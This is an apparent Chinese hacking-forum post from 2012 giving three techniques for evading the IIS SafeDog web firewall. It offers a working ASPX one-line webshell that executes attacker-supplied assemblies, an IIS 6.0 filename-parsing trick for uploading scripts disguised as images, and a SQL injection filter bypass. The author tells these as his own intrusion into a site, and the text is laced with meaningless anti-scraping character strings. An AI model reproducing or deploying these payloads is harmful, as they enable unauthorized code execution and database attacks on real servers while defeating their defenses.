1、绕过IIS安全狗的一句话。
7 l5 j) f1 ~0 H# [5 X7 K4 T前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。6 _6 S. Q( Q6 b1 u. f8 u, J
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
4 S$ I9 r1 ?; ?: r9 o* D( b
( [8 b0 |% P) P3 g: B s2、IIS6.0解析漏洞遇到安全狗。
8 Q5 M! M# g% ^. F. [文件名为
0 |& z- `. k: Z3 Khttp://www.xxxxx.com/sh3llc0de.asp;1.jpg: G* o: C: p7 {& v( d6 S
6 u/ e+ a5 H& x/ T这样的会被IIS安全狗果断屏蔽。
/ W1 n+ o4 a5 u7 p0 \改成如下名称,IIS6一样会解析:
& s7 M! B7 Q; U( Y$ S, Owww.xxxxx.com/;1.asp;1.jpg8 h- ^2 T4 h, B3 p4 p
0 K& Y* d9 ^3 ?( Z
3、安全狗的注入绕过。9 a+ u. Y) T0 S8 O; ^0 a
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
; C6 N" h* R; u& b; r! S但如果:
, B. m( r* ]5 D, ir00ts.asp?r00ts.com=%00.&id=69%20 and 1=11 D: ^/ w+ @% a# q& N3 V: t
就可以成功绕过了。0 u2 W! h/ [4 {
/ e& T0 f& x( V4 K
1 k3 r" h. {# d, ]$ X |
发表于 2012-10-31 08:25:30
收藏
支持
反对